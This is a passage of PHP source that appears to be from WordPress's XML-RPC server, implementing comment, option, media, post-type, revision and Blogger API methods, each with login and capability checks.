* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* }
* @return bool|IXR_Error See wp_delete_comment().
*/
public function wp_deleteComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_comment( $comment_id ) ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to delete this comment.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteComment', $args, $this );
$status = wp_delete_comment( $comment_id );
if ( true === $status ) {
/**
* Fires after a comment has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the deleted comment.
* @param array $args An array of arguments to delete the comment.
*/
do_action( 'xmlrpc_call_success_wp_deleteComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
return $status;
}
/**
* Edits a comment.
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a comment_id integer and a content_struct array as the last argument.
*
* The allowed keys in the content_struct array are:
* - 'author'
* - 'author_url'
* - 'author_email'
* - 'content'
* - 'date_created_gmt'
* - 'status'. Common statuses are 'approve', 'hold', 'spam'. See get_comment_statuses() for more details.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* @type array $4 Content structure.
* }
* @return true|IXR_Error True, on success.
*/
public function wp_editComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$content_struct = $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! get_comment( $comment_id ) ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to moderate or edit this comment.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editComment', $args, $this );
$comment = array(
'comment_ID' => $comment_id,
);
if ( isset( $content_struct['status'] ) ) {
$statuses = get_comment_statuses();
$statuses = array_keys( $statuses );
if ( ! in_array( $content_struct['status'], $statuses, true ) ) {
return new IXR_Error( 401, __( 'Invalid comment status.' ) );
}
$comment['comment_approved'] = $content_struct['status'];
}
// Do some timestamp voodoo.
if ( ! empty( $content_struct['date_created_gmt'] ) ) {
// We know this is supposed to be GMT, so we're going to slap that Z on there by force.
$date_created = rtrim( $content_struct['date_created_gmt']->getIso(), 'Z' ) . 'Z';
$comment['comment_date'] = get_date_from_gmt( $date_created );
$comment['comment_date_gmt'] = iso8601_to_datetime( $date_created, 'gmt' );
}
if ( isset( $content_struct['content'] ) ) {
$comment['comment_content'] = $content_struct['content'];
}
if ( isset( $content_struct['author'] ) ) {
$comment['comment_author'] = $content_struct['author'];
}
if ( isset( $content_struct['author_url'] ) ) {
$comment['comment_author_url'] = $content_struct['author_url'];
}
if ( isset( $content_struct['author_email'] ) ) {
$comment['comment_author_email'] = $content_struct['author_email'];
}
$result = wp_update_comment( $comment, true );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the comment could not be updated.' ) );
}
/**
* Fires after a comment has been successfully updated via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the updated comment.
* @param array $args An array of arguments to update the comment.
*/
do_action( 'xmlrpc_call_success_wp_editComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Creates a new comment.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string|int $3 Post ID or URL.
* @type array $4 Content structure.
* }
* @return int|IXR_Error See wp_new_comment().
*/
public function wp_newComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post = $args[3];
$content_struct = $args[4];
/**
* Filters whether to allow anonymous comments over XML-RPC.
*
* @since 2.7.0
*
* @param bool $allow Whether to allow anonymous commenting via XML-RPC.
* Default false.
*/
$allow_anon = apply_filters( 'xmlrpc_allow_anonymous_comments', false );
$user = $this->login( $username, $password );
if ( ! $user ) {
$logged_in = false;
if ( $allow_anon && get_option( 'comment_registration' ) ) {
return new IXR_Error( 403, __( 'Sorry, you must be logged in to comment.' ) );
} elseif ( ! $allow_anon ) {
return $this->error;
}
} else {
$logged_in = true;
}
if ( is_numeric( $post ) ) {
$post_id = absint( $post );
} else {
$post_id = url_to_postid( $post );
}
if ( ! $post_id ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! get_post( $post_id ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! comments_open( $post_id ) ) {
return new IXR_Error( 403, __( 'Sorry, comments are closed for this item.' ) );
}
if (
'publish' === get_post_status( $post_id ) &&
! current_user_can( 'edit_post', $post_id ) &&
post_password_required( $post_id )
) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to comment on this post.' ) );
}
if (
'private' === get_post_status( $post_id ) &&
! current_user_can( 'read_post', $post_id )
) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to comment on this post.' ) );
}
$comment = array(
'comment_post_ID' => $post_id,
'comment_content' => trim( $content_struct['content'] ),
);
if ( $logged_in ) {
$display_name = $user->display_name;
$user_email = $user->user_email;
$user_url = $user->user_url;
$comment['comment_author'] = $this->escape( $display_name );
$comment['comment_author_email'] = $this->escape( $user_email );
$comment['comment_author_url'] = $this->escape( $user_url );
$comment['user_id'] = $user->ID;
} else {
$comment['comment_author'] = '';
if ( isset( $content_struct['author'] ) ) {
$comment['comment_author'] = $content_struct['author'];
}
$comment['comment_author_email'] = '';
if ( isset( $content_struct['author_email'] ) ) {
$comment['comment_author_email'] = $content_struct['author_email'];
}
$comment['comment_author_url'] = '';
if ( isset( $content_struct['author_url'] ) ) {
$comment['comment_author_url'] = $content_struct['author_url'];
}
$comment['user_id'] = 0;
if ( get_option( 'require_name_email' ) ) {
if ( strlen( $comment['comment_author_email'] ) < 6 || '' === $comment['comment_author'] ) {
return new IXR_Error( 403, __( 'Comment author name and email are required.' ) );
} elseif ( ! is_email( $comment['comment_author_email'] ) ) {
return new IXR_Error( 403, __( 'A valid email address is required.' ) );
}
}
}
$comment['comment_parent'] = isset( $content_struct['comment_parent'] ) ? absint( $content_struct['comment_parent'] ) : 0;
/** This filter is documented in wp-includes/comment.php */
$allow_empty = apply_filters( 'allow_empty_comment', false, $comment );
if ( ! $allow_empty && '' === $comment['comment_content'] ) {
return new IXR_Error( 403, __( 'Comment is required.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newComment', $args, $this );
$comment_id = wp_new_comment( $comment, true );
if ( is_wp_error( $comment_id ) ) {
return new IXR_Error( 403, $comment_id->get_error_message() );
}
if ( ! $comment_id ) {
return new IXR_Error( 403, __( 'An error occurred while processing your comment. Please ensure all fields are filled correctly and try again.' ) );
}
/**
* Fires after a new comment has been successfully created via XML-RPC.
*
* @since 3.4.0
*
* @param int $comment_id ID of the new comment.
* @param array $args An array of new comment arguments.
*/
do_action( 'xmlrpc_call_success_wp_newComment', $comment_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $comment_id;
}
/**
* Retrieves all of the comment status.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getCommentStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'publish_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getCommentStatusList', $args, $this );
return get_comment_statuses();
}
/**
* Retrieves comment counts.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* }
* @return array|IXR_Error
*/
public function wp_getCommentCount( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$post = get_post( $post_id, ARRAY_A );
if ( empty( $post['ID'] ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details of this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getCommentCount', $args, $this );
$count = wp_count_comments( $post_id );
return array(
'approved' => $count->approved,
'awaiting_moderation' => $count->moderated,
'spam' => $count->spam,
'total_comments' => $count->total_comments,
);
}
/**
* Retrieves post statuses.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPostStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostStatusList', $args, $this );
return get_post_statuses();
}
/**
* Retrieves page statuses.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageStatusList( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPageStatusList', $args, $this );
return get_page_statuses();
}
/**
* Retrieves page templates.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageTemplates( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
$templates = get_page_templates();
$templates['Default'] = 'default';
return $templates;
}
/**
* Retrieves blog options.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Options.
* }
* @return array|IXR_Error
*/
public function wp_getOptions( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$options = isset( $args[3] ) ? (array) $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
// If no specific options where asked for, return all of them.
if ( count( $options ) === 0 ) {
$options = array_keys( $this->blog_options );
}
return $this->_getOptions( $options );
}
/**
* Retrieves blog options value from list.
*
* @since 2.6.0
*
* @param array $options Options to retrieve.
* @return array
*/
public function _getOptions( $options ) {
$data = array();
$can_manage = current_user_can( 'manage_options' );
foreach ( $options as $option ) {
if ( array_key_exists( $option, $this->blog_options ) ) {
$data[ $option ] = $this->blog_options[ $option ];
// Is the value static or dynamic?
if ( isset( $data[ $option ]['option'] ) ) {
$data[ $option ]['value'] = get_option( $data[ $option ]['option'] );
unset( $data[ $option ]['option'] );
}
if ( ! $can_manage ) {
$data[ $option ]['readonly'] = true;
}
}
}
return $data;
}
/**
* Updates blog options.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Options.
* }
* @return array|IXR_Error
*/
public function wp_setOptions( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$options = (array) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'manage_options' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to update options.' ) );
}
$option_names = array();
foreach ( $options as $o_name => $o_value ) {
$option_names[] = $o_name;
if ( ! array_key_exists( $o_name, $this->blog_options ) ) {
continue;
}
if ( $this->blog_options[ $o_name ]['readonly'] ) {
continue;
}
update_option( $this->blog_options[ $o_name ]['option'], wp_unslash( $o_value ) );
}
// Now return the updated values.
return $this->_getOptions( $option_names );
}
/**
* Retrieves a media item by ID.
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Attachment ID.
* }
* @return array|IXR_Error Associative array contains:
* - 'date_created_gmt'
* - 'parent'
* - 'link'
* - 'thumbnail'
* - 'title'
* - 'caption'
* - 'description'
* - 'metadata'
*/
public function wp_getMediaItem( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$attachment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'upload_files' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to upload files.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getMediaItem', $args, $this );
$attachment = get_post( $attachment_id );
if ( ! $attachment || 'attachment' !== $attachment->post_type ) {
return new IXR_Error( 404, __( 'Invalid attachment ID.' ) );
}
return $this->_prepare_media_item( $attachment );
}
/**
* Retrieves a collection of media library items (or attachments).
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a filter array as the last argument.
*
* Accepted 'filter' keys are 'parent_id', 'mime_type', 'offset', and 'number'.
*
* The defaults are as follows:
* - 'number' - Default is 5. Total number of media items to retrieve.
* - 'offset' - Default is 0. See WP_Query::query() for more.
* - 'parent_id' - Default is ''. The post where the media item is attached.
* Empty string shows all media items. 0 shows unattached media items.
* - 'mime_type' - Default is ''. Filter by mime type (e.g., 'image/jpeg', 'application/pdf')
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* }
* @return array|IXR_Error Array containing a collection of media items.
* See wp_xmlrpc_server::wp_getMediaItem() for a description
* of each item contents.
*/
public function wp_getMediaLibrary( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$struct = isset( $args[3] ) ? $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'upload_files' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to upload files.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getMediaLibrary', $args, $this );
$parent_id = ( isset( $struct['parent_id'] ) ) ? absint( $struct['parent_id'] ) : '';
$mime_type = ( isset( $struct['mime_type'] ) ) ? $struct['mime_type'] : '';
$offset = ( isset( $struct['offset'] ) ) ? absint( $struct['offset'] ) : 0;
$number = ( isset( $struct['number'] ) ) ? absint( $struct['number'] ) : -1;
$attachments = get_posts(
array(
'post_type' => 'attachment',
'post_parent' => $parent_id,
'offset' => $offset,
'numberposts' => $number,
'post_mime_type' => $mime_type,
)
);
$attachments_struct = array();
foreach ( $attachments as $attachment ) {
$attachments_struct[] = $this->_prepare_media_item( $attachment );
}
return $attachments_struct;
}
/**
* Retrieves a list of post formats used by the site.
*
* @since 3.1.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error List of post formats, otherwise IXR_Error object.
*/
public function wp_getPostFormats( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to access details about this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostFormats', $args, $this );
$formats = get_post_format_strings();
// Find out if they want a list of currently supports formats.
if ( isset( $args[3] ) && is_array( $args[3] ) ) {
if ( $args[3]['show-supported'] ) {
if ( current_theme_supports( 'post-formats' ) ) {
$supported = get_theme_support( 'post-formats' );
$data = array();
$data['all'] = $formats;
$data['supported'] = $supported[0];
$formats = $data;
}
}
}
return $formats;
}
/**
* Retrieves a post type.
*
* @since 3.4.0
*
* @see get_post_type_object()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Post type name.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error Array contains:
* - 'labels'
* - 'description'
* - 'capability_type'
* - 'cap'
* - 'map_meta_cap'
* - 'hierarchical'
* - 'menu_position'
* - 'taxonomies'
* - 'supports'
*/
public function wp_getPostType( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_type_name = $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default post type query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of post type fields to retrieve. By default,
* contains 'labels', 'cap', and 'taxonomies'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_posttype_fields', array( 'labels', 'cap', 'taxonomies' ), 'wp.getPostType' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostType', $args, $this );
if ( ! post_type_exists( $post_type_name ) ) {
return new IXR_Error( 403, __( 'Invalid post type.' ) );
}
$post_type = get_post_type_object( $post_type_name );
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts in this post type.' ) );
}
return $this->_prepare_post_type( $post_type, $fields );
}
/**
* Retrieves post types.
*
* @since 3.4.0
*
* @see get_post_types()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error
*/
public function wp_getPostTypes( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array( 'public' => true );
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_posttype_fields', array( 'labels', 'cap', 'taxonomies' ), 'wp.getPostTypes' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPostTypes', $args, $this );
$post_types = get_post_types( $filter, 'objects' );
$struct = array();
foreach ( $post_types as $post_type ) {
if ( ! current_user_can( $post_type->cap->edit_posts ) ) {
continue;
}
$struct[ $post_type->name ] = $this->_prepare_post_type( $post_type, $fields );
}
return $struct;
}
/**
* Retrieves revisions for a specific post.
*
* @since 3.5.0
*
* The optional $fields parameter specifies what fields will be included
* in the response array.
*
* @uses wp_get_post_revisions()
* @see wp_getPost() for more on $fields
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Post ID.
* @type array $4 Optional. Fields to fetch.
* }
* @return array|IXR_Error Array containing a collection of posts.
*/
public function wp_getRevisions( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$post_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default revision query fields used by the given XML-RPC method.
*
* @since 3.5.0
*
* @param array $field An array of revision fields to retrieve. By default,
* contains 'post_date' and 'post_date_gmt'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_revision_fields', array( 'post_date', 'post_date_gmt' ), 'wp.getRevisions' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getRevisions', $args, $this );
$post = get_post( $post_id );
if ( ! $post ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
// Check if revisions are enabled.
if ( ! wp_revisions_enabled( $post ) ) {
return new IXR_Error( 401, __( 'Sorry, revisions are disabled.' ) );
}
$revisions = wp_get_post_revisions( $post_id );
if ( ! $revisions ) {
return array();
}
$struct = array();
foreach ( $revisions as $revision ) {
if ( ! current_user_can( 'read_post', $revision->ID ) ) {
continue;
}
// Skip autosaves.
if ( wp_is_post_autosave( $revision ) ) {
continue;
}
$struct[] = $this->_prepare_post( get_object_vars( $revision ), $fields );
}
return $struct;
}
/**
* Restores a post revision.
*
* @since 3.5.0
*
* @uses wp_restore_post_revision()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Revision ID.
* }
* @return bool|IXR_Error false if there was an error restoring, true if success.
*/
public function wp_restoreRevision( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$revision_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.restoreRevision', $args, $this );
$revision = wp_get_post_revision( $revision_id );
if ( ! $revision ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( wp_is_post_autosave( $revision ) ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
$post = get_post( $revision->post_parent );
if ( ! $post ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $revision->post_parent ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
// Check if revisions are disabled.
if ( ! wp_revisions_enabled( $post ) ) {
return new IXR_Error( 401, __( 'Sorry, revisions are disabled.' ) );
}
$post = wp_restore_post_revision( $revision_id );
return (bool) $post;
}
/*
* Blogger API functions.
* Specs on http://plant.blogger.com/api and https://groups.yahoo.com/group/bloggerDev/
*/
/**
* Retrieves blogs that user owns.
*
* Will make more sense once we support multiple blogs.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getUsersBlogs( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
if ( is_multisite() ) {
return $this->_multisite_getUsersBlogs( $args );
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getUsersBlogs', $args, $this );
$is_admin = current_user_can( 'manage_options' );
$struct = array(
'isAdmin' => $is_admin,
'url' => get_option( 'home' ) . '/',
'blogid' => '1',
'blogName' => get_option( 'blogname' ),
'xmlrpc' => site_url( 'xmlrpc.php', 'rpc' ),
);
return array( $struct );
}
/**
* Private function for retrieving a users blogs for multisite setups.
*
* @since 3.0.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
protected function _multisite_getUsersBlogs( $args ) {
$current_blog = get_site();
$domain = $current_blog->domain;
$path = $current_blog->path . 'xmlrpc.php';
$blogs = $this->wp_getUsersBlogs( $args );
if ( $blogs instanceof IXR_Error ) {
return $blogs;
}
if ( $_SERVER['HTTP_HOST'] === $domain && $_SERVER['REQUEST_URI'] === $path ) {
return $blogs;
} else {
foreach ( (array) $blogs as $blog ) {
if ( str_contains( $blog['url'], $_SERVER['HTTP_HOST'] ) ) {
return array( $blog );
}
}
return array();
}
}
/**
* Retrieves user's data.
*
* Gives your client some info about you, so you don't have to.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getUserInfo( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to access user data on this site.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getUserInfo', $args, $this );
$struct = array(
'nickname' => $user->nickname,
'userid' => $user->ID,
'url' => $user->user_url,
'lastname' => $user->last_name,
'firstname' => $user->first_name,
);
return $struct;
}
/**
* Retrieves a post.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Post ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return array|IXR_Error
*/
public function blogger_getPost( $args ) {
$this->escape( $args );
$post_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$post_data = get_post( $post_id, ARRAY_A );
if ( ! $post_data ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_post', $post_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this post.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getPost', $args, $this );
$categories = implode( ',', wp_get_post_categories( $post_id ) );
$content = '<title>' . wp_unslash( $post_data['post_title'] ) . '</title>';
$content .= '<category>' . $categories . '</category>';
$content .= wp_unslash( $post_data['post_content'] );
$struct = array(
'userid' => $post_data['post_author'],
'dateCreated' => $this->_convert_date( $post_data['post_date'] ),
'content' => $content,
'postid' => (string) $post_data['ID'],
);
return $struct;
}
/**
* Retrieves the list of recent posts.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 App key (unused).
* @type int $1 Blog ID (unused).
* @type string $2 Username.
* @type string $3 Password.
* @type int $4 Optional. Number of posts.
* }
* @return array|IXR_Error
*/
public function blogger_getRecentPosts( $args ) {
$this->escape( $args );
// $args[0] = appkey - ignored.
$username = $args[2];
$password = $args[3];
if ( isset( $args[4] ) ) {
$query = array( 'numberposts' => absint( $args[4] ) );
} else {
$query = array();
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'blogger.getRecentPosts', $args, $this );
$posts_list = wp_get_recent_posts( $query );
if ( ! $posts_list ) {
$this->error = new IXR_Error( 500, __( 'No posts found or an error occurred while retrieving posts.' ) );
return $this->error;
}
$recent_posts = array();
foreach ( $posts_list as $entry ) {
if ( ! current_user_can( 'edit_post', $entry['ID'] ) ) {
continue;
}
$post_date = $this->_convert_date( $entry['post_date'] );
$categories = implode( ',', wp_get_post_categories( $entry['ID'] ) );
$content = '<title>' . wp_unslash( $entry['post_title'] ) . '</title>';
$content .= '<category>' . $categories . '</category>';
$content .= wp_unslash( $entry['post_content'] );
$recent_posts[] = array(
'userid' => $entry['post_author'],
'dateCreated' => $post_date,
'content' => $content,
'postid' => (string) $entry['ID'],
);
}
return $recent_posts;
}
/**
* Deprecated.
*
* @since 1.5.0
* @deprecated 3.5.0
*
* @param array $args Unused.
* @return IXR_Error Error object.
*/
public function blogger_getTemplate( $args ) {
return new IXR_Error( 403, __( 'Sorry, this method is not supported.' ) );
